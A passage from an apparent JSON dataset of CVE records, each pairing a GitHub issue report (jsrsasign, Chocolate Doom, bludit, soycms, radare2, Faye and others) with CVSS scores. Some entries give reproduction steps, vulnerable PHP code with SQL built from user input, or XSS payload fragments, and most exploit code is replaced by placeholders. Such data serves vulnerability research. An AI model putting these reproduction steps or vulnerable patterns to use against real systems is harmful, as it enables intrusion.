malicious SQL statements. The attacker is able to change the logic of SQL statements executed against the database or extract sensitive information Desktop (please complete the following information): Windows NUMBERTAG Pro Browser: Firefox XAMPP NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-14966",
        "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/437",
        "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/437",
        "Repo_new": "kjur/jsrsasign",
        "Issue_Created_At": "2020-06-06T18:11:17Z",
        "description": "Lack of encoding checking in jsrsasign allows a certain degree of malleability in ECDSA signatures. Hello, I've found that jsrsasign NUMBERTAG allows a certain degree of malleability in ECDSA signatures by not checking overflows in the length of sequence and NUMBERTAG s appended or prepended to an integer. Using the secp NUMBERTAG r1 curve it its possible to verify this issue using the following test vectors of Google Wycheproof: ERRORTAG Using the following proof of concept: ERRORTAG The output is: CODETAG However, if you use FILETAG crypto: CODETAG the output is: CODETAG Best regards, Antonio",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14967",
        "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/439",
        "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/439",
        "Repo_new": "kjur/jsrsasign",
        "Issue_Created_At": "2020-06-06T18:19:15Z",
        "description": "The RSA PKCS NUMBERTAG decryption implementation does not detect ciphertext modification (prepended NUMBERTAG s bytes to the ciphertext). The jsrsasign NUMBERTAG RSA PKCS NUMBERTAG decryption implementation does not detect prepended NUMBERTAG s bytes to the ciphertext and accepts modified ciphertexts without error. You can verify this using the following test vectors from Google Wycheproof: ERRORTAG and proof of concept: ERRORTAG with result: APITAG Best regards, Antonio",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14968",
        "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/438",
        "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/438",
        "Repo_new": "kjur/jsrsasign",
        "Issue_Created_At": "2020-06-06T18:15:25Z",
        "description": "The RSA PSS implementation does not detect signature modification (prepending NUMBERTAG bytes) to the signature. The jsrsasign NUMBERTAG RSASSA PSS (RSA PSS) implementation does not detect prepending NUMBERTAG s to the signature and accepts modifies signatures with prepended NUMBERTAG s as valid. You can verify this using the following test vectors from Google Wycheproof: CODETAG in the following proof of concept: ERRORTAG with result: APITAG Best regards, Antonio",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-14983",
        "Issue_Url_old": "https://github.com/chocolate-doom/chocolate-doom/issues/1293",
        "Issue_Url_new": "https://github.com/chocolate-doom/chocolate-doom/issues/1293",
        "Repo_new": "chocolate-doom/chocolate-doom",
        "Issue_Created_At": "2020-06-22T16:20:12Z",
        "description": "Missing server side num_players validation leading to buffer overflow. Background Version of Chocolate Doom: Chocolate Doom NUMBERTAG from the website) Chocolate Doom git revision APITAG confirmed also in: Crispy Doom NUMBERTAG Operating System and version: Ubuntu NUMBERTAG Compilation: APITAG pwd APITAG Game: ( PATHTAG ) APITAG Bug description When the client starts the game, it sends its settings using the APITAG function. The server receives and parses it in the APITAG function. The settings packet consist of the APITAG integer. This value is used as an maximum value while iterating over corresponding settings and writing them to the APITAG fixed sized NUMBERTAG elements) array. ERRORTAG CODETAG The client can send any byte value and fill the packet with additional bytes to write outside the array and cause stack based buffer overflow. APITAG Modified client's code: CODETAG When all of the clients are connected and the owner starts the game, the server crashes. APITAG Chocolate Doom ASAN: ERRORTAG Chocolate Doom without asan: ERRORTAG Chocolate Doom without stack protection: ERRORTAG Crispy Doom ASAN APITAG ERRORTAG Fix proposition ERRORTAG found by Micha\u0142 Dardas from APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15006",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1212",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1212",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-06-19T07:23:19Z",
        "description": "Store XSS. Describe your problem FILETAG Logo upload only determines the suffix, but not the content, which causes XSS and the user can inject any javascript and html code in the page payload FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-15014",
        "Issue_Url_old": "https://github.com/pramodmahato/BlogCMS/issues/1",
        "Issue_Url_new": "https://github.com/pramodmahato/blogcms/issues/1",
        "Repo_new": "pramodmahato/blogcms",
        "Issue_Created_At": "2020-06-24T06:42:26Z",
        "description": "There is a csrf vulnerability in FILETAG file. First,let's look at PATHTAG APITAG file does not filter the \"referer\": APITAG APITAG APITAG \"; echo $site; } $result = mysqli_query($db,\"select from users where email like '$email';\"); $row = mysqli_fetch_assoc($result); APITAG if(isset($_POST['submit'])) { $old=md5($_POST['oldpass']); $new=md5($_POST['newpass']); if($old==$originalpass) { $newsql=\"UPDATE users SET Password = '$new' WHERE email='$email'\"; if(mysqli_query($db, $newsql)){ echo APITAG Changed Successfully\"; APITAG }else { echo \" APITAG ERRORTAG updating record: \".$mysqli_error($db).\"') APITAG \"; } } else { echo \" APITAG APITAG Password') APITAG \"; } } ?> Second,I tested this with the Burp tool. I left out the referer and I added the referer and it returns the same thing. Third:I write a poc for this vulnerability:As follows: APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG testing, the vulnerability exists.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15018",
        "Issue_Url_old": "https://github.com/antonraharja/playSMS/issues/605",
        "Issue_Url_new": "https://github.com/playsms/playsms/issues/605",
        "Repo_new": "playsms/playsms",
        "Issue_Created_At": "2020-03-20T06:59:49Z",
        "description": "Session Fixation. APITAG is vulnerable to Session fixation ( all versions, including the latest ). Due to the lack of randomization of the APITAG and reuse of APITAG (prior login, after login). An attacker can set the user's session and can take control of the user's account. Steps to reproduce NUMBERTAG Login to APITAG ( Note down the value of cookie [ PHPSESSID NUMBERTAG Logout NUMBERTAG You can confirm the same session by checking prior login and after logging in NUMBERTAG You can observe that the value of PHPSESSID will be the same as in Step NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15026",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1214",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1214",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-06-23T03:25:01Z",
        "description": "Arbitrary file download vulnerability. problem hi, The problem is in the backup plugin, the $file parameter is not filtered, resulting in arbitrary file downloads recurrent FILETAG repair URLTAG url Filter $file parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-15041",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2330",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2330",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-05-19T07:03:05Z",
        "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in PHP Fusion NUMBERTAG APITAG Version). Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Links\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Site Link NUMBERTAG Insert payload: '> APITAG APITAG APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Click APITAG Link NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-15071",
        "Issue_Url_old": "https://github.com/symphonycms/symphonycms/issues/2917",
        "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2917",
        "Repo_new": "symphonycms/symphonycms",
        "Issue_Created_At": "2020-06-18T01:57:47Z",
        "description": "XSS vulnerability. FILETAG APITAG .... .... .... ERRORTAG .... .... .... ERRORTAG Here data from $_POST to HTML allows attacker to trigger an XSS with payload llike fields FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15091",
        "Issue_Url_old": "https://github.com/tendermint/tendermint/issues/4926",
        "Issue_Url_new": "https://github.com/tendermint/tendermint/issues/4926",
        "Repo_new": "tendermint/tendermint",
        "Issue_Created_At": "2020-05-31T06:18:15Z",
        "description": "Consensus: APITAG APITAG is invalid\" Error: \"wrong signature\". Tendermint version : Tendermint Core Semantic Version NUMBERTAG P2P Protocol Version NUMBERTAG Block Protocol Version NUMBERTAG CODETAG ABCI app : Cosmos SDK Version NUMBERTAG CODETAG Big Dipper Explorer URL: APITAG Instructions to setup a similar node (I'd suggest just setting up a sentry): APITAG Access to genesis file for chain: APITAG Sample command to get node info: APITAG Discord channel invite (in case you want to live chat with me... I am Neeraj one of the admins): APITAG Environment : OS (e.g. from /etc/os release): APITAG Install tools : Using COSMOS SDK NUMBERTAG Otherwise, not sure what else to say here. Others : We are running a testnet chain with our CRUD database as one of the application modules, in COSMOS. We currently (as of filing this issue) have NUMBERTAG sentries\" and NUMBERTAG alidators. To be clear, the sentries have no voting power and are the only peers that the validators talk to (the validators can talk to each other too). Furthermore, the validators are IP firewalled to only be able to talk to the sentries and other validators. The sentries themselves keep the validator node id's private. Sentry hostnames: CODETAG I am not listing the validator hostnames, since they are inaccessible (due to the firewall) anyways. The validators are only listening on NUMBERTAG to validators and sentries. The sentries are listening on NUMBERTAG and NUMBERTAG and also each run the cosmos REST server, listening on NUMBERTAG We have opened our testnet to the public. Members of the public have setup sentries and validators of their own, and are expected to use our five sentries as their P2P peers in APITAG What happened : For weeks, things on our testnet had been running fine. I had dozens of members of the public running validators on it, just so these people could learn the process of setting up a validator, etc. I needed to increase the max of allowed validators (to something much higher than the default value of NUMBERTAG in the PATHTAG value in FILETAG . I think that this particular value is a COSMOS thing, but I wanted to mention it for context. We are not using COSMOS governance yet, so we decided to do a hard reset (ie: generate a new FILETAG and start the chain all over). First, here is what I did on my OWN NUMBERTAG sentries and NUMBERTAG alidators: Stopped all my sentries and validators. Wiped out their .blzd folders (this is the name of my \"home\" folder for my \"blzd\" daemons). Because of this, the nodes will all get new node ids and will be new \"peers\". Re initialized each sentry and validator with \"blzd init\", etc... much like I always do when I setup a validator or sentry from scratch (setting up peers, etc). I had also increased the \"max_num_inbound_peers\" to NUMBERTAG and \"max_num_outbound_peers\" to NUMBERTAG in the [p2p] section of APITAG This might only be anecdotal in value. I had an issue where we had too many connects to my sentries and they were dropping connections on the p2p port. Generated the new genesis. Deployed this genesis to all the sentries and validators. Run the necessary COSMOS commands to get the validators staked, created, etc. Start up all my sentries and validators, (thereby starting up the new chain from block NUMBERTAG Next, here is what I asked the people in the community to do with their validator and/or sentries: Run \"blzd unsafe reset all\" on all their daemons. I asked the community do this instead of wiping out the \".blzd\" folder, to save them some work. Copy over the new FILETAG file, replacing the old FILETAG . Set the new peers list in the p2p section of APITAG Run the necessary COSMOS commands to get the validators staked, created, etc. Start up their sentries and validators. The community slowly started up their daemons. At some point (within an hour or so, about NUMBERTAG blocks in), I started to get the error below. I was getting this on all my sentries and validators. Basically, the chain had completely crashed. I tried to restart my validators and sentries, but this was unrecoverable. CODETAG To had no choice but to \"reset\" the whole chain again. I stopped all my validators and sentries and this time, ONLY ran \"unsafe reset all\" on all my daemons. Of course, I also had to do some COSMOS setup again (staking, etc), but started everything again, and asked the community to again do the same steps listed above with yet a new FILETAG , etc. Within an hour, the whole network went down again. Effectively the same error (different block, signature HASH this time): CODETAG What you expected to happen : I expect \"clean\" output, as so: CODETAG APITAG fact that APITAG is non zero is the subject of another investigation) Have you tried the latest version : Not sure. I think so. Although in looking at the Tendermint Github, I see there are two minor versions available that are newer than what we have. How to reproduce it : I more or less explained how it came about above in the \"what happened\" section. Looking at NUMBERTAG I see a similar error message, but not quite the same. But in looking at that issue, it was suggested that perhaps all the nodes did not start from the same \"genesis\" state. It is suggested that perhaps some node(s) have a stale \"home folder\" (.blzd, I presume?). Does \"unsafe reset all\" actually clear out all state including the COSMOS KV stores, app state, etc? I assume this command is sufficient to accomplish a clean slate? Is it possible that in \"resetting\" my chain as I did above, some members of the public possibly forgot to run that \"blzd unsafe reset all\" command, and by missing this step, when they started their node, it had data from the previous chain left over, and this somehow brought the whole network down? If so, it is a bit scary that a single node (or even a bunch of them) could do this. It is an excellent APITAG attack vector, it seems, if so. Logs : Listed above. Config : No specific changes made to Tendermint. node command runtime flags : This is all running from within our daemon that was built with the COSMOS SDK. APITAG output for consensus bugs Not sure how to do this. Anything else we need to know : Most details given above. I did some searching ahead of time to see if I could resolve this myself. I saw some issues related to it but they are already closed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15121",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/16945",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/16945",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2020-05-24T12:20:29Z",
        "description": "Command injection across r_sys_cmd . Work environment | Questions | Answers | | | PATHTAG (mandatory) | N/A | File format of the file you reverse (mandatory) | PE | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | >= radare2 APITAG Expected behavior idpd does not cause untrusted code execution on my system. Actual behavior Malformed PDB file names in the PDB server path cause shell injection via the following codepath: URLTAG In effect, APITAG is not escaped properly, causing this issue. Note that this is not an isolated case in the code base, grep for APITAG or APITAG for more potential attack vectors. Steps to reproduce the behavior Open the executable in radare2 and run idpd to trigger the download. The shell code will execute, and will create a file called pwned in the current directory. Additional Logs, screenshots, source code, configuration dump, ... I have just used a hex editor to patch the APITAG to APITAG in a PE file from the APITAG repository. FILETAG (password is infected ) The example above is specific to the PDB downloader, but more investigation is required to uncover all the possible attack vectors in the radare2 code base.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-15133",
        "Issue_Url_old": "https://github.com/eventmachine/eventmachine/issues/814",
        "Issue_Url_new": "https://github.com/eventmachine/eventmachine/issues/814",
        "Repo_new": "eventmachine/eventmachine",
        "Issue_Created_At": "2017-12-07T08:30:46Z",
        "description": "Request for improved SSL server certificate verification. From URLTAG I'm not entirely sure if this is the right PR/issue to discuss this on, but I can briefly summarize what EM support I think would be required for implementing SSL clients with server certificate verification, Listed in terms of the exposed libssl APIs: FILETAG Supported in eventmachine/eventmachine NUMBERTAG by extending APITAG FILETAG with SSL_VERIFY_PEER: already supported in EM: URLTAG The APITAG callback MUST return false by default if called with APITAG . The APITAG ignoring the APITAG parameter is the most blatantly broken part of the implementation, because this effectively bypasses all of the libssl certificate validation logic \ud83d\udc7f Based on my reading of the docs and issues like eventmachine/eventmachine NUMBERTAG I suspect this even includes very fundamental things like \"the private key used to sign the session key matches the public key in the certificate\". FILETAG : already supported in URLTAG ? I think the APITAG + APITAG changes would be the bare minimum that would be required. These also match the changes dicussed/implemented in eventmachine/eventmachine NUMBERTAG Additional bonus points for: SSL_get_verify_result NUMBERTAG erify_cert_error_string to allow the application to report more useful error messages than just \"certificate verification failed\" Some convenience wrapper for the cert subject/hostname validation ideally there should be some kind of secure: true/false boolean that doesn't require each client developer to research and write their own certificate verification wrappers for the vast majority of usecases I think Ruby's APITAG URLTAG can probably be used by applications together with the APITAG API, so it doesn't necessarily need to be part of EM itself.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.7,
        "impactScore": 5.8,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-15133",
        "Issue_Url_old": "https://github.com/faye/faye/issues/524",
        "Issue_Url_new": "https://github.com/faye/faye/issues/524",
        "Repo_new": "faye/faye",
        "Issue_Created_At": "2020-07-19T21:22:57Z",
        "description": "Address em http request warnings about APITAG . APITAG supports making TCP connections via the [ APITAG ][em connect] method. Once the connection is established, the client can initiate a TLS session over the socket by calling [ APITAG ][em start tls]. This method _does not_ verify the server's identity by default, but it does accept an option named APITAG . If this is set, the connection will invoke [ APITAG ][em verify peer], a method supplied by the caller which performs certificate validation. That is, APITAG does not implement such a validation routine itself; it requires the caller to supply one. APITAG makes use of two libraries that use this interface: [em http request][em http] and [faye websocket][faye ws]. The latter is maintained by the Faye project and the former by a third party. In June NUMBERTAG a [security advisory][em advisory] was published relating to the of of this APITAG interface in em http request. This followed an [issue][issue NUMBERTAG reporting the problem and a [pull request][pr NUMBERTAG to fix it. The em http request maintainers decided to address this problem by publishing a patch version release, version NUMBERTAG making the following changes: Importing an [implementation of APITAG ][faraday verify] from the APITAG library (by copying the code, not by linking to this package) Sending APITAG to APITAG only if instructed by the caller Logging a warning if the caller does not ask for peer verification This course of action was chosen in order to alert existing users to insecure behaviour, and giving them an easy remediation for it; enabling peer verification by default may break some existing legitimate clients, for example clients talking to trusted servers using self signed certificates. It is worth noting a couple of things about the APITAG implementation imported into em http request from Faraday. First, Faraday is a common interface over several different Ruby HTTP clients, and em http request is one of its supported adapters. Faraday enables APITAG by default, and therefore patches em http request at runtime to support this. So, this patch exists because Faraday wants peer verification to be default behaviour, and they patched em http request to make it possible. Second, the implementation that em http request has now imported is the very first version of this code committed to Faraday's codebase in July NUMBERTAG released in version NUMBERTAG in January NUMBERTAG This code has been modified a few times since, most recently in October NUMBERTAG before the release of Faraday NUMBERTAG in January NUMBERTAG It is not clear why or how this version of the APITAG code was selected. A cursory inspection of the imported code against [the latest version in Faraday][faraday verify latest], and reading the commit history of this file, indicates the code is doing essentially the same thing in terms of calls to the APITAG module, but has been refactored to clarify control flow and to comply with linter warnings. There has been one [bug fix][fix host] made to the original code to use the hostname from the request URI, not the connection hostname, to verify the certificate (these may differ if the request is sent via a proxy). The code imported into em http request does not include this fix. The Faye project needs to decide how to address this problem. Users that have installed the latest em http request are now seeing warnings in their logs that APITAG is not set. No other functional difference has taken place in these programs; they were already not doing peer verification, what's changed is that their authors now _know_ about it. There are a few things to take into consideration here. The least effort change Faye could make would be to send APITAG to em http request, causing it to verifiy server certificates and removing the warning from users' logs. This would have the effect that the initial request to the server would now be verified. However, since faye websocket suffers from the same non verification problem, the Faye client would be making an unverified connection if it subsequently switched to using APITAG This suggests we should have feature parity between these two network transports so that Faye as a whole can make a consistent guarantee to users; enabling verification for normal HTTP but not for APITAG and taking no further measures, would give users a false sense of security. This prompts the question of what changes faye websocket should make to gain parity. In the FILETAG version of Faye, we rely on the default behaviour of the https and tls modules, which is to verify certificates unless explicitly told otherwise. However, sometimes we want to connect to servers whose certificates are not recognised by the usual system certificate authority (CA), for example servers with self signed certificates, even if only for testing purposes. Node provides a mechanism for this: rather than simply turning verification off with the ERRORTAG option, one can use the ca option to pass one's own set of certificate authorities, rather than using the system one. Thus, a client can still trust a server it knows the certificate of, without opting out of verification entirely and exposing itself to person in the middle attacks. The APITAG implementation in em http request does not support this; it only enables the default paths for APITAG and does not let the user set their own. This means that to talk to a server with a self signed cert one would have to leave APITAG unset. APITAG that explicitly setting APITAG rather than merely leaving it unset still causes the warning to be logged.) So, even if faye websocket were to add the ability to set custom CAs, Faye would not be able offer the same ability we're limited by the functionality offered by em http request. That said, I would still prefer for faye websocket in Ruby to work like its Node counterpart, and for Faye to get as close as we can to that. i.e. it should set APITAG by default, allow it to be unset, and provide a way to supply your own CAs, which should be preferred over unsetting APITAG . This leaves two remaining problems: implementing the required functionality in faye websocket, and supporting APITAG in Faye itself. If both em http request and faye websocket support setting APITAG , then Faye can make use of this functionality. em http request defaults to not setting this option so we should think about the effect if we were to set it by default. If faye websocket defaults to enabling APITAG , and Faye doesn't have any defined behaviour other than to forward the caller's options to each library, then we'll get different behaviour depending on whether we're using HTTP or APITAG which is undesirable. Whichever default we choose, a later release of em http request might change its behaviour. So either way, Faye needs to have an explicit policy about the default value of APITAG to send to these libraries if this option is not set by the caller. At present (in version NUMBERTAG Faye does not support the caller setting any TLS options that are sent to em http request. The only TLS related option it currently sends is APITAG , which it gets from the request URL. As clients currently do not have any control over the setting of this option, they will be getting the same behaviour as if they'd set APITAG . Therefore, defaulting to APITAG may cause a change in behaviour that could constitute a breaking change. There are broadly two categories of situation in which a Faye client would break if APITAG were enabled: The client is not talking to the server it thinks it is, because verification is turned off and the client is being attacked The client is intentionally talking to a server that the system CAs would not recognised, for example a server with a self signed cert I would consider the first situation a bug: this is not intentional usage and the client would benefit from being alerted to the fact it's talking to an untrusted server. Setting APITAG would mean fixing the bug and is therefore not a breaking change. The second situation is intentional and supported usage, and if we set APITAG by default then these clients will stop working. We need to provide these clients with a way to start working again, and would therefore need to expose the APITAG option so they can switch it off. This is not an ideal solution but is the only one open to us given the current functionality exposed in em http request. Exposing this option would constitute a new feature, and breaking these clients in the first place may constitute a breaking change. If Faye defaults to APITAG , then no existing clients would change their behaviour (which may regarded as a bug per the above), and we would have to expose the ability to enable APITAG . This gives us the option of introducing the option as a new feature without a breaking change, but this would still be at least a minor release, not a patch. As regards the implementation, I have [opened a PR][faye ws pr] against faye websocket containing an implementation to add support for APITAG and APITAG . Details and discussion of the implementation should happen on that PR rather than this issue. I am opening this issue to discuss the overall strategy and how everything needs to fit together in Faye. [em]: URLTAG [em connect]: URLTAG [em start tls]: URLTAG [em verify peer]: URLTAG [em http]: URLTAG [faye ws]: URLTAG [faraday]: URLTAG [em advisory]: URLTAG [issue NUMBERTAG URLTAG [pr NUMBERTAG URLTAG [faraday verify]: FILETAG [faraday verify latest]: FILETAG [fix host]: URLTAG [faye ws pr]: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.7,
        "impactScore": 5.8,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-15158",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/250",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/250",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2020-08-12T05:23:33Z",
        "description": "Possilbe heap buffer overflow when COTP message with invalid size is received. COTP message is size field set to zero can cause invalid memory access.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15188",
        "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/10",
        "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/10",
        "Repo_new": "inunosinsi/soycms",
        "Issue_Created_At": "2020-09-14T12:06:36Z",
        "description": "Unauthenticated Remote Code Execution (RCE) in APITAG Title Unauthenticated Remote Code Execution (RCE) in APITAG Summary Severity: Critical APITAG NUMBERTAG and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the website. The vulnerability is caused by unserializing the form without any restrictions. Impact: Unauthenticated Remote Code Execution via Inquiry Form Attack vector is: Inquiry Form needs to be enabled. Components are: Soy Inquiry Form Tested APITAG Version NUMBERTAG latest) Affected APITAG Version NUMBERTAG Found by MENTIONTAG from Vulnerability Research Team in Flatt Security Inc. URLTAG Full Exploit Video: URLTAG Cause When the inquiry is submitted and the captcha is taken, form submits APITAG and APITAG , and value is checked as the following. URLTAG By the PHP's official guideline, unserialize is a function that should not be used when user can control the argument APITAG FILETAG APITAG can be generated locally, so it is possible to control this value and use appropriate classes to trigger code execution. Remediation Use APITAG and APITAG instead. I will make a Fix PR as soon as possible.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15189",
        "Issue_Url_old": "https://github.com/inunosinsi/soycms/issues/9",
        "Issue_Url_new": "https://github.com/inunosinsi/soycms/issues/9",
        "Repo_new": "inunosinsi/soycms",
        "Issue_Created_At": "2020-09-14T12:05:06Z",
        "description": "Remote Code Execution (RCE) in APITAG Title Remote Code Execution (RCE) in APITAG Summary Severity: High APITAG NUMBERTAG and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross Site Scripting(XSS) vulnerability that was reported earlier can be chained in order to perform a successful remote code execution by redirecting the administrator to load a specially crafted webpage. Impact: XSS to RCE via Inquiry Error and Unrestricted File Upload Attack vector is: Administrator must be logged in. Components are: File Manager Tested APITAG Version NUMBERTAG latest) Affected APITAG Version NUMBERTAG Found by MENTIONTAG from Vulnerability Research Team in Flatt Security Inc. URLTAG Full Exploit Video: URLTAG Cause The file upload feature in APITAG is using APITAG However, it was found out that mimetype can be fooled to upload a PHP file. There is no feature in APITAG to check the file type so it needs to be manually implemented. URLTAG URLTAG Remediation Please add a file extension check from APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-15250",
        "Issue_Url_old": "https://github.com/junit-team/junit4/issues/1676",
        "Issue_Url_new": "https://github.com/junit-team/junit4/issues/1676",
        "Repo_new": "junit-team/junit4",
        "Issue_Created_At": "2020-10-14T06:18:11Z",
        "description": "CVETAG doesn't affect versions prior to NUMBERTAG but claims it did. URLTAG says it affects any version prior to NUMBERTAG which is not true as rules didn't exist before NUMBERTAG So the proper range would be NUMBERTAG up to NUMBERTAG This is probably not terribly important but it caused dependabot to cry wolf on projects that are (deliberately) still using older versions like extensions for APITAG NUMBERTAG that happen to be still maintained. The same is/will soon be true for a bunch of other static code analyzers checking oldish code bases.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-15253",
        "Issue_Url_old": "https://github.com/grocy/grocy/issues/996",
        "Issue_Url_new": "https://github.com/grocy/grocy/issues/996",
        "Repo_new": "grocy/grocy",
        "Issue_Created_At": "2020-09-08T14:34:09Z",
